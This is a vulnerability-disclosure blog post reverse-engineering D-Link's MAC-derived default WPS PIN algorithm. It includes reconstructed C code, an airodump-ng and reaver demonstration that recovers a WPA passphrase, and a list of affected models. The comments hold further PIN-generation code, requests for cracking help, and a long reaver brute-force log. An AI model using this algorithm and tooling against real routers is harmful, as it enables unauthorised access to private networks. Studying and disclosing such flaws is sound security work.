Reversing D-Link’s WPS Pin Algorithm

While perusing the latest firmware for D-Link’s DIR-810L 80211ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:

Call to sub_4D56F8 from getWPSPinCode

Call to sub_4D56F8 from getWPSPinCode

I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:

The beginning of sub_4D56F8

The beginning of sub_4D56F8

This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):

Break out the MAC and start munging the NIC

Break out the MAC and start munging the NIC

While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:

li $v0, 0x38E38E39
multu $a3, $v0
...
mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = ((a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.

However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
    char *mac;
    char mac_address[32] = { 0 };
    unsigned int oui, nic, pin;

    /* Get a pointer to the WAN MAC address */
    mac = lockAndGetInfo_log()->wan_mac_address;

    /* 
     * Create a local, NULL-terminated copy of the WAN MAC (simplified from
     * the original code's sprintf/memmove loop).
     */
    sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
                                                     mac[1],
                                                     mac[2],
                                                     mac[3],
                                                     mac[4],
                                                     mac[5],
                                                     mac[6],
                                                     mac[7],
                                                     mac[8],
                                                     mac[9],
                                                     mac[10],
                                                     mac[11]);

    /* 
     * Convert the OUI and NIC portions of the MAC address to integer values.
     * OUI is unused, just need the NIC.
     */
    sscanf(mac_address, "%06X%06X", &oui, &nic);

    /* Do some XOR munging of the NIC. */
    pin = (nic ^ 0x55AA55);
    pin = pin ^ (((pin & 0x0F) << 4) +
                 ((pin & 0x0F) << 8) +
                 ((pin & 0x0F) << 12) +
                 ((pin & 0x0F) << 16) +
                 ((pin & 0x0F) << 20));
 
    /*
     * The largest possible remainder for any value divided by 10,000,000
     * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
     */
     pin = pin % 10000000;
 
    /* The pin needs to be at least 7 digits long */
    if(pin < 1000000)
    {
        /*
         * The largest possible remainder for any value divided by 9 is
         * 8; hence this adds at most 9,000,000 to the pin value, and at
         * least 1,000,000. This guarantees that the pin will be 7 digits
         * long, and also means that it won't start with a 0.
         */
        pin += ((pin % 9) * 1000000) + 1000000;
    }
 
    /*
     * The final 8 digit pin is the 7 digit value just computed, plus a
     * checksum digit. Note that in the disassembly, the wps_pin_checksum
     * function is inlined (it's just the standard WPS checksum implementation).
     */
    pin = ((pin * 10) + wps_pin_checksum(pin));

    sprintf(buf, "%08d", pin);
    return pin;
}

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

 CH  4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1 
                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                    
C0:A0:BB:EF:B3:D6  -13   0        6        0    0   4  54e  WPA2 CCMP   PSK  dlink-B3D6 

$ ./pingen C0:A0:BB:EF:B3:D7   # <--- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:

Confirmed Affected:

  1. DIR-810L
  2. DIR-826L
  3. DIR-632
  4. DHP-1320
  5. DIR-835
  6. DIR-615 revs: B2, C1, E1, E3
  7. DIR-657
  8. DIR-827
  9. DIR-857
  10. DIR-451
  11. DIR-655 revs: A3, A4, B1
  12. DIR-825 revs: A1, B1
  13. DIR-651
  14. DIR-855
  15. DIR-628
  16. DGL-4500
  17. DIR-601 revs: A1, B1
  18. DIR-836L
  19. DIR-808L
  20. DIR-636L
  21. DAP-1350
  22. DAP-1555

Confirmed Unaffected:

  1. DIR-815
  2. DIR-505L
  3. DIR-300
  4. DIR-850L
  5. DIR-412
  6. DIR-600
  7. DIR-685
  8. DIR-817LW
  9. DIR-818LW
  10. DIR-803
  11. DIR-845L
  12. DIR-816L
  13. DIR-860L
  14. DIR-645
  15. DIR-685
  16. DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.

Bookmark the permalink.

55 Responses to Reversing D-Link’s WPS Pin Algorithm

  1. shutin says:

    Great work! So if I understand correctly.. Instead of generating a random PIN at the factory and putting that in NVRAM, they use some code to generate a calculable PIN from the MAC, and put *that* in NVRAM? Whyyyyy? So if you completely wipe NVRAM and then reinstall factory software the number printed on the bottom of the unit is still viable?

    Makes you wonder how many other routers have a similar method, since they all need to be able to retrieve that printed PIN on the bottom somehow.

    This is why I’ll never buy a consumer router again. I went to pfSense on a dedicated computer and have never looked back.

    • Craig says:

      they use some code to generate a calculable PIN from the MAC, and put *that* in NVRAM?

      Correct.

      Whyyyyy?

      Ha, good question. Likely convenience, laziness, or a bit of both.

      So if you completely wipe NVRAM and then reinstall factory software the number printed on the bottom of the unit is still viable?

      Based on the code I’ve seen, yes, the device can still restore its default pin even if you’ve wiped NVRAM. Haven’t tested that myself though.

      Makes you wonder how many other routers have a similar method

      WPS pins generated from MAC addresses is not new, several other devices/vendors have been caught doing it in the past.

    • Fghjkutr says:

      What sane person has WPS enabled anyway?

  2. Anon says:

    Hate to be the tinfoil hat wearer, but this is exactly the kind of “backdoor” enabling bug that the feds like.

  3. ternarybit says:

    I was examining the default configs on AT&T U-Verse modem/routers some time ago, and found the device’s serial number is just the decimal version of the unit’s BSSID. The ESSID is ATT### where ### is the last three digits of the serial number–they’re everywhere.

    Since the default PSK is a 10-digit decimal number, I suspected it must be derived somehow from the WAN MAC or BSSID. This post has reawakened my curiosity about this. Awesome work Craig.

  4. Pingback: Reverse Engineering the D-Link WPS Pin Algorithm

  5. Pingback: Reverse Engineering the D-Link WPS Pin Algorithm - Tech key | Techzone | Tech data

  6. M says:

    What decompiler is that for MIPS?

  7. Ulvi says:

    Great work. Unfortunantly i couldn’t catch any dlink aps to try this.

    • Craig says:

      Search Google and Ebay for people who have taken pictures of the bottoms of their D-Links; there’s usually a sticker on the bottom that shows both the MAC address and the default WPS pin. You can plug the MAC address into the algorithm and see if the same WPS pin pops out. 🙂

  8. Pingback: Reverse Engineering the D-Link WPS Pin Algorithm | Hack The Planet

  9. Pingback: Reversing D-Link's WPS Pin Algorithm – Craig Heffner | siyahsapka.org

  10. Pingback: Reverse Engineering the D-Link WPS Pin Algorithm | 0-HACK

  11. Pingback: .:[ d4 n3wS ]:. » L’algo de gĂ©nĂ©ration de clĂ© WPS des D-Link rĂ©versĂ©

  12. Amihai says:

    that is the worst implementation to the worst protocol ever

  13. Special_K says:

    Hi. Great discovery!

    What do i do if my mac doesnt end with a number?
    How do i count up?

    For Example: XX:XX:XX:XX:ED:FD ? thanks in advance

  14. Dan says:

    Does those models come with WPS enabled by default?

  15. Pingback: Smarta enheter och säkerhet | Dataskydd

  16. Anonymous says:

    Very interesting read (as always on this site), thanks for sharing.
    My router is a Zyxel P-2601HN and Mediatek provides the source code for its Ralink drivers for downloading, I found this code snippet in there. (http://cdn-cw.mediatek.com/Downloads/linux/DPO_RT5572_LinuxSTA_2.6.1.3_20121022.tar.bz2).

    Luckily, my ISP does not open WPS by default. There is a physical button to press on the device when WPS is needed.

    I was wondering if the WPA2PSK passphrase were also generated from the MAC address?


    INT ComputeChecksum(
    IN UINT PIN)
    {
    INT digit_s;
    UINT accum = 0;

    PIN *= 10;
    accum += 3 * ((PIN / 10000000) % 10);
    accum += 1 * ((PIN / 1000000) % 10);
    accum += 3 * ((PIN / 100000) % 10);
    accum += 1 * ((PIN / 10000) % 10);
    accum += 3 * ((PIN / 1000) % 10);
    accum += 1 * ((PIN / 100) % 10);
    accum += 3 * ((PIN / 10) % 10);

    digit_s = (accum % 10);
    return ((10 - digit_s) % 10);
    } /* ComputeChecksum*/

    UINT GenerateWpsPinCode(
    IN PRTMP_ADAPTER pAd,
    IN BOOLEAN bFromApcli,
    IN UCHAR apidx)
    {
    UCHAR macAddr[MAC_ADDR_LEN];
    UINT iPin;
    UINT checksum;

    NdisZeroMemory(macAddr, MAC_ADDR_LEN);

    #ifdef CONFIG_STA_SUPPORT
    IF_DEV_CONFIG_OPMODE_ON_STA(pAd)
    NdisMoveMemory(&macAddr[0], pAd->CurrentAddress, MAC_ADDR_LEN);
    #endif /* CONFIG_STA_SUPPORT */

    iPin = macAddr[3] * 256 * 256 + macAddr[4] * 256 + macAddr[5];

    iPin = iPin % 10000000;

    checksum = ComputeChecksum( iPin );
    iPin = iPin*10 + checksum;

    return iPin;
    }

    • Craig says:

      Yes, based on that code it appears to be generating a pin from the system’s MAC address (probably the LAN/BSSID MAC). You’ll probably want to verify that against an actual device though.

      Are you sure WPS isn’t enabled by default? Just because it has a push button doesn’t mean WPS isn’t open (all WPS enabled routers have a push button); in fact, the push button typically won’t work at all if WPS has been disabled, which is why just about every vendor/ISP leaves WPS enabled by default (user convenience). I’d check the device’s configuration settings and make sure WPS is explicitly disabled.

      • Anonymous says:

        The pin code matches the last 3 bytes of the mac address on my router (I did not bother to verify the checksum digit though).

        Also, WPS is disabled in my setup, and I think it is disabled by default, but I can remember for sure. The web admin interface confirms WPS is off and my wireshark captures as well (the beacon frame shows a MIcrosoft WPS extension if WPS is available).

        I also verified that the beacon frames coming from some neighbors at the same ISP do not offer WPS.

        I could still be in theory that the router accepts a WPS authentification even though its beacon frames do not advertise for it. This would not be the first security hole this device has to offer. I am quite temptated to try that. That would mean free wifi for me in the whole country ;), let alone all the security/privacy implications this would have.

  17. Pingback: D-Link-Router mit Schwachstellen im WPS-Algorithmus | WorldNews

  18. Pingback: WPS-SicherheitslĂĽcke: D-Link-Router sind leichtes Ziel fĂĽr Angreifer » Computer Wissen Information

  19. Pingback: Robert McGhee » November 11th

  20. kcdtv says:

    It seems taht DIR-601 v2 is affected
    http://pix.toile-libre.org/upload/original/1415501783.png
    while the 601 v1 seems to don’t have WPS
    http://support.dlink.com/emulators/dir601/100NA/support_internet.html#Wireless

    Thanks Craig for sharing with us this very nice piece of reverse engineering.

  21. DK says:

    So what’s

    Default pin of this router’s mac?

    xx:xx:xx:0D:5B:4A

    I am not sure which model is this

    6C:19:8F

  22. Scott says:

    Router manufacturers REALLY need to subject their firmware developers to third-party code reviews. Or even code reviews. Heck, things would be loads better if they just assigned a QA person to test around their code. The context here is security, but there’s other context to worry about like network abuse.

    Good luck trying to notify D-Link security officers about this; you’ll have to talk your way past Mumbai support first.

    I worked on a DDNS provider’s update server for many years. A majority of the DDNS abuse traffic came from D-Link. Far more than from Linksys, etc. D-Link developers would allow end users to “enable” DDNS, and then SAVE even if domain, username and password were blank. They would also automatically retry failed credentials forever, as if the server might somehow get exhausted and accept bad credentials. You could try to block D-link’s user Agent, but then they would do things like put random text into the Agent String to escape blocking. There was also some incident years ago where D-Link firmware would DDOS public NTP servers.

    These people are clearly not network enthusiasts. If you want to pick out their faults, your blog will be busy for a long time…

  23. Kartik says:

    Hey, can you please tell me how to run your script and get the PINs? I do not know how to use that algorithm, so kindly help me.

  24. Rsc says:

    Wow, amazing stuff really.

    I’m wondering if it’s the case for some of the Tp-link routers as well. Is this something you would be interested in researching in the future?

  25. Alex says:

    Does anyone know where to find or how to generate just the full list of all possible wps pins as a text file?

  26. qwerty says:

    How can I run the script???
    Please, help me

  27. Pingback: Reversing Belkin’s WPS Pin Algorithm - /dev/ttyS0

  28. Pingback: We TOLD you not to use WPS on your Wi-Fi router! We TOLD you not to knit your own crypto! | Prague City Magazine / Living | the ins and outs of living in prague, czech republic

  29. Pingback: ste williams – We TOLD you not to use WPS on your Wi-Fi router! We TOLD you not to knit your own crypto!

  30. Pingback: Just need the MAC and serial to generate Belkin WPS PinSecurity Affairs

  31. Pingback: Just need the MAC and serial number to generate Belkin WPS Pin - Systerity

  32. Pingback: Just need the MAC and serial number to generate Belkin WPS Pin

  33. Pingback: Wi-Foo | RISC expert

  34. mayo says:

    hi… do someone try DIR615 G/H version? have any successful crack pin?

  35. Pingback: D-Link Router - Standardpasswort (WLAN) errechnen?

  36. rekoon says:

    plz i want text file in it pin code evry pin code like this
    and
    I want to guess automatic

    00000001
    34324243
    44434344
    32323232
    32454545
    11231231
    34324324

  37. mark says:

    Can you help me with this d link dsl 2740?
    I have a Problem with Ap limit,Wps lock,
    I have try with mdk3 for unlock….

    root@bt:~/reaver-wps-fork-t6x/src# reaver -i mon0 -b B8:A3:86:E7:D8:F0 -vvv -c6

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
    mod by t6_x & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Switching mon0 to channel 6
    [?] Restore previous session for B8:A3:86:E7:D8:F0? [n/Y] y
    [+]
    p1_index set to 0
    [+] p2_index set to 56
    [+]
    Restored previous session
    [+] Waiting for beacon from B8:A3:86:E7:D8:F0
    [+]
    Associated with B8:A3:86:E7:D8:F0 (ESSID: silver600)
    [+] Starting Cracking Session. Pin count: 10056, Max pin attempts: 11000
    [+]
    Trying pin 43210473.
    [+] Sending EAPOL START request
    [+]
    Received identity request
    [+]
    Sending identity response
    [+] Received identity request
    [+]
    Sending identity response

    [P] E-Nonce: d8:e2:2b:16:95:82:22:fe:0f:72:3b:de:4a:7f:4f:85

    [P] PKE: 9d:e1:f8:11:cb:12:f8:94:ce:48:c8:db:8f:d2:87:b3:ba:71:6c:d8:f8:47:b0:93:1e:97:e9:0b:b2:c4:85:a5:e9:d5:d2:92:f0:e2:07:1d:c4:88:0d:d4:18:d9:0a:30:b5:ef:75:ca:88:24:e3:62:df:d3:61:68:99:70:43:29:dd:26:5b:70:79:d3:78:52:26:4f:7d:2f:fd:8c:6c:7d:0c:14:4a:16:f5:10:03:de:02:6f:16:3e:91:4a:f8:93:83:f7:38:ea:d9:ee:c7:73:0e:fe:5e:30:e4:e1:90:81:b2:6f:79:59:e5:3c:b9:01:ce:b9:a2:82:a0:51:46:1d:40:f7:f1:38:c7:08:fd:5e:d1:e4:fa:ef:1e:eb:47:ee:9d:cb:61:b9:64:06:ee:ca:89:e0:12:e6:d4:8d:50:12:1b:2a:68:57:5b:8b:fb:5d:dd:29:24:bc:b9:9b:ba:37:75:87:34:cc:a5:4f:9c:3f:54:77:6e:b1:e4:78:ba:91

    [P] WPS Manufacturer: Ayecom
    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 30:af:69:83:8e:0e:29:da:a6:96:fa:c1:31:4b:9d:55

    [P] PKR: 10:47:6d:66:23:bd:1d:77:af:5e:a8:e2:93:b0:0c:c1:0d:e6:6a:6e:87:7a:e0:b3:12:08:dc:b4:d9:44:86:06:01:26:11:7a:16:d3:06:45:cd:6d:d4:6a:72:70:81:85:9b:2a:40:d3:ef:b8:c9:ab:16:3e:ae:6e:8e:8b:cd:44:90:ec:52:58:46:f4:0b:2a:b4:f8:32:83:68:4c:03:ea:5c:40:4a:a7:d3:e0:43:3e:9e:95:fa:cf:88:57:74:be:36:f4:7e:ad:c2:15:ae:cc:54:43:f8:67:ec:f4:0c:06:60:ed:db:61:86:37:71:af:16:ab:e8:49:08:df:a8:7d:b5:af:d4:b6:f4:18:a5:aa:00:99:89:46:a1:61:75:fb:0d:0c:fe:22:7b:96:2b:f6:be:3a:d9:75:87:b6:d3:31:0f:d3:09:12:58:76:47:2a:d0:13:7d:70:51:c5:d2:c7:59:2d:eb:85:d6:b3:a0:25:43:43:83:da:76:fc:71:13

    [P] AuthKey: f1:ee:54:6b:46:f0:32:9b:d4:15:d4:4c:dd:2b:23:0a:d0:13:c7:1b:d9:a0:16:c2:9e:c0:4d:18:fa:91:0f:5c

    [+] Sending M2 message

    [P] E-Hash1: 7b:ce:34:ce:52:3f:cd:01:96:c9:08:2e:d1:63:a0:2c:56:c6:75:40:ed:22:10:22:d5:e1:11:b7:a1:b6:bc:92

    [P] E-Hash2: 3b:3e:d3:51:2a:98:3c:98:3c:d8:91:b4:05:76:17:a0:5e:52:9d:85:06:49:a7:c7:9c:85:6d:d4:55:68:bf:0a

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 57

    [+] Pin count advanced: 10057. Max pin attempts: 11000

    [+] Trying pin 43210480.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 61:a3:6f:f1:69:cd:6a:be:c4:9b:65:51:76:7e:70:91

    [P] PKE: 0d:ac:c8:d4:23:d3:3a:53:21:bb:74:53:50:9e:21:a1:05:28:b4:43:cf:5c:66:95:08:cb:bf:53:bb:cb:d0:e0:8a:e8:04:fa:7f:ec:5a:53:85:91:7b:07:a3:ca:91:8f:e2:10:eb:0a:2c:b1:4a:bd:64:62:dc:45:3e:c0:ea:aa:9b:89:ca:aa:6e:46:d7:00:2f:c8:6b:56:be:7d:87:65:19:40:71:27:66:f4:49:b5:1b:31:94:cb:7f:66:ce:a3:25:37:32:b6:0c:da:44:7d:62:0c:b2:d7:4a:01:16:05:68:3a:ed:4e:a5:00:a7:80:f2:c2:c9:e3:bb:2f:9f:b1:56:40:6d:fe:08:fb:f8:d5:7c:38:1d:48:dd:fe:67:31:38:be:96:73:0a:f6:52:76:b7:c5:d1:fd:61:f3:20:ac:6e:46:51:89:e0:3b:89:3b:c1:ad:3c:65:44:8d:3f:af:45:3a:b3:c5:9d:cf:e8:ad:8a:75:df:00:d3:5c:25:aa

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 3e:69:5e:84:3d:6e:f8:2c:c2:fd:76:06:19:0a:e5:f8

    [P] PKR: 91:90:89:b9:88:50:f5:98:08:c0:6e:8d:a3:2a:5c:97:bd:b7:3e:8f:ca:d3:d6:2f:fd:03:ce:69:2e:55:57:6a:b7:3d:26:9a:81:d9:da:ec:79:a9:31:03:d8:7d:a9:fd:7b:8d:12:c9:48:12:5d:2b:d5:94:82:b1:b2:1f:44:be:d5:69:d4:b1:b9:fe:0a:0d:80:6b:b2:d7:6e:2a:be:b9:88:28:2d:ed:f8:55:b2:1c:0e:e7:91:19:f8:e7:b0:f0:20:c6:0e:f9:8d:42:3c:c2:59:9f:24:dd:3e:62:05:7d:3f:23:4a:0a:d4:ac:61:b3:8e:fb:bc:33:94:5c:4f:1e:87:22:4d:f7:1a:fe:a0:ef:b7:ea:72:6b:04:7c:a3:48:f4:bd:25:93:eb:5f:a1:08:d4:03:b0:c4:cd:46:40:c4:21:fa:f5:ab:2e:b2:df:12:6d:01:41:23:c1:63:65:c8:20:f3:5d:68:cc:f9:bb:e7:d0:a8:15:47:cb:6c:8c:58

    [P] AuthKey: 8b:aa:64:81:e1:5f:b1:c2:19:c6:44:b9:ad:ba:94:a1:21:ce:31:18:fd:1f:52:4d:12:43:f6:47:30:d2:41:a1

    [+] Sending M2 message

    [P] E-Hash1: 82:60:10:2b:7f:2a:4c:bd:ab:6f:77:5d:8d:2d:a5:80:0f:8e:b4:92:1c:6c:fc:d8:85:08:00:23:76:04:ee:74

    [P] E-Hash2: d1:f8:fd:15:80:ae:83:58:3b:42:12:67:eb:c2:97:44:5e:39:4a:f6:33:2a:b1:ad:41:8e:3f:74:dc:04:6e:6a

    [+] Received M3 message
    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 58

    [+] Pin count advanced: 10058. Max pin attempts: 11000

    [+] Trying pin 43210497.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 51:e6:a8:4e:ae:dd:a4:50:4b:95:b6:ae:1f:b1:80:01

    [P] PKE: 58:cf:3c:d1:2a:ad:ac:f4:b2:53:9b:7f:56:d4:f4:db:47:6d:4e:60:bf:c6:89:26:30:bc:c9:58:68:65:5d:b2:83:33:85:35:36:9b:a3:86:e0:80:aa:7a:dd:76:17:8a:db:bd:c0:e7:ca:86:7e:ae:0d:11:f7:ab:40:2d:1e:e0:c9:0f:e9:5b:9f:9f:cb:ea:1a:a2:d6:c3:ac:6b:21:0e:ee:a5:75:94:3b:2e:c7:93:e5:f2:c2:7e:a2:5d:d9:b6:ec:fe:35:65:e5:8a:5e:1e:c7:fb:be:cf:c4:80:c5:40:1f:3f:44:42:fb:77:1f:4d:79:d7:b4:78:0c:06:a6:90:48:e6:18:f3:8f:6e:ae:d6:2c:48:7e:36:cc:b6:ed:66:34:10:aa:28:ac:7e:80:a9:26:65:a5:fd:ff:ed:c6:31:63:6c:52:cf:25:b8:3c:22:f5:a0:79:05:ca:82:f2:52:73:5f:4f:cc:0b:3f:41:1d:f2:5e:10:2a:ca:85:c9:dd

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    P] R-Nonce: bd:22:92:5f:27:8e:6a:09:ef:92:e2:9b:ef:b4:30:7d

    [P] PKR: 26:86:c0:81:ed:e1:1d:b7:a5:6c:bf:b6:b6:5a:7c:0c:58:77:5e:bf:ac:72:f9:36:fc:31:a2:46:33:ff:01:9a:ff:be:4d:23:f3:9b:20:5b:85:21:01:e7:61:49:ca:b5:c8:d7:d1:bb:c5:6a:ff:79:da:cc:2a:94:cf:e3:d2:37:cc:c3:7f:83:62:2c:cf:37:4d:cc:51:ab:10:bc:b0:e3:5a:4c:de:9f:2c:38:31:13:fa:41:d3:b5:90:26:85:61:d4:7b:7c:ff:49:1e:c9:7c:94:2b:11:3c:11:de:ef:50:d0:95:1b:09:19:e1:dc:e0:1c:87:4a:dd:f1:54:fa:ce:51:4b:4c:08:74:b2:78:38:a4:b2:b6:12:4d:6a:de:0e:2f:30:5f:ef:1e:3a:30:dc:cd:f2:9e:59:cf:76:4f:35:1d:91:21:d6:56:eb:fd:b5:70:f2:07:cf:4e:8d:62:49:ec:77:1b:c5:3a:6f:1a:60:2a:34:27:30:32:d6:52:32

    [P] AuthKey: d8:47:ed:67:e5:2d:dd:e8:ec:8d:ff:e6:8b:ed:49:95:00:8c:61:38:cd:7e:e2:49:8f:ba:a2:f0:be:2b:3d:83

    [+] Sending M2 message

    [P] E-Hash1: e1:69:00:6b:f7:bc:24:22:e5:85:82:67:bd:96:98:ad:4b:3d:57:27:41:3e:dc:08:de:1a:a9:10:0d:65:30:ad

    [P] E-Hash2: f0:f4:95:b5:ac:74:7e:90:10:d8:2d:94:e7:73:9e:21:36:c2:09:62:c7:d7:87:c8:93:8d:9d:c9:46:23:9c:84

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 59

    [+] Pin count advanced: 10059. Max pin attempts: 11000

    [+] Trying pin 43210503.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 15:c9:2c:ee:d3:2b:52:28:58:d3:92:25:20:ff:95:73

    [P] PKE: 27:fb:c0:0d:6b:5a:59:f0:a5:27:7b:17:df:8f:e8:65:7c:2c:98:86:36:ce:01:9a:d5:c7:3d:8e:a7:14:39:3f:ce:c1:1e:5b:27:a5:a5:46:ed:eb:de:97:0e:5c:cc:72:3e:a9:9f:fb:36:8d:7d:c6:f8:ae:05:33:88:b7:df:d8:a1:91:61:fd:10:ed:0f:81:9c:7f:08:9f:0c:ab:45:71:15:45:13:cf:b8:6c:88:e3:71:61:9b:6d:5d:71:89:99:ec:af:09:2f:cf:9c:83:2b:69:98:7e:d1:61:2b:bd:42:c4:fe:4f:c1:2a:fc:d6:04:49:a4:a5:17:f5:06:fe:c1:e5:82:a5:0c:c9:bd:e3:35:97:5f:98:c1:34:ef:97:92:28:06:a6:c6:01:1e:e0:2b:cd:29:fc:f7:03:c9:b6:95:c2:12:eb:8d:d6:d1:92:0e:02:02:48:cf:2c:ad:e7:60:a3:9d:20:0f:1f:c6:e6:3a:2a:67:03:f7:84:95:71:b5

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: ca:8f:09:a6:b4:11:1b:9d:31:10:e6:e0:f8:2a:cb:ee

    [P] PKR: 73:95:ae:cd:91:09:02:07:99:5e:bb:cc:ec:07:bc:03:30:f4:25:d2:de:17:11:e6:34:09:cd:04:8a:34:4e:25:6d:3d:4a:4f:0f:ae:87:07:70:c2:86:c3:29:86:25:8d:2d:29:1d:07:23:fa:df:d5:29:58:d9:61:9d:6b:e9:f5:12:46:d9:e0:18:80:8f:e5:ff:29:a3:a0:ed:a5:1e:58:78:51:07:c9:47:2a:c9:fe:66:57:ca:00:5f:e2:29:79:c9:1a:19:f0:93:0d:13:42:2d:4d:a6:fd:31:22:f3:b1:c8:bc:53:52:75:77:6a:ab:53:42:d5:db:55:ff:f7:c3:c6:09:ce:5b:ca:7d:a0:eb:cd:4a:b2:0e:94:8a:98:dc:11:f5:5e:e5:dc:ea:34:b8:1e:70:18:92:9f:24:6a:82:03:d3:23:50:a4:36:6f:c4:a1:4b:47:83:1d:55:34:d1:15:50:e0:0d:6d:ae:e8:2a:13:ef:d2:1c:0d:19:11:4b

    [P] AuthKey: ef:2a:e1:73:98:a5:53:2a:b9:99:89:ed:a0:84:19:a7:52:71:5b:27:f4:1b:53:90:92:61:d9:b5:4a:67:db:8d

    [+] Sending M2 message

    [P] E-Hash1: f1:21:8e:e0:67:ef:bb:12:ad:da:5e:4e:92:4d:67:cf:f5:51:12:a0:72:ad:7f:ce:1e:dd:89:2a:a4:8d:5b:12

    [P] E-Hash2: 9d:73:a7:f7:d4:c9:a6:9e:c9:cb:6f:f3:2e:e8:bf:80:ff:1f:e8:44:da:f7:96:67:6a:9f:44:8c:ad:e9:ea:bd

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 60

    [+] Pin count advanced: 10060. Max pin attempts: 11000

    [+] Trying pin 43210510.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 05:a3:16:b6:c7:c0:41:d3:07:46:5c:c5:d0:20:fe:83

    [P] PKE: 6a:fe:9f:c5:a9:6c:ae:f4:e3:5e:5b:19:db:fa:24:56:48:d0:c2:6d:0d:a5:93:77:9a:e3:27:84:9c:5c:d1:b6:24:af:69:93:43:c4:31:c2:07:eb:f9:46:84:f9:25:fd:d6:5b:b6:d2:a1:97:b9:ac:78:b4:99:1d:f1:7e:d1:23:c3:ce:fc:f4:c7:78:a7:f6:64:ec:3f:aa:99:b4:a4:cc:c0:0a:04:e7:24:44:98:8c:b9:3f:a8:92:6b:c5:60:6d:45:cf:7a:43:4e:ac:5a:2a:2d:e2:76:f2:64:bd:49:54:cf:eb:c6:80:6b:e6:2e:f1:73:97:e4:6f:2f:f2:5a:ab:b3:fb:f9:df:68:5a:40:43:04:6c:e1:40:fd:a4:0c:5f:d1:5b:4b:d5:37:b3:df:1a:0c:94:2a:4f:7a:50:5e:e3:d6:eb:ae:27:0d:49:e2:84:5f:dd:91:82:ae:ca:23:e8:20:93:ad:60:d5:51:ed:a1:a6:4e:44:06:0a:d4:59:23

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 79:ad:3b:30:83:7a:cc:91:07:4b:db:15:80:0f:aa:a6

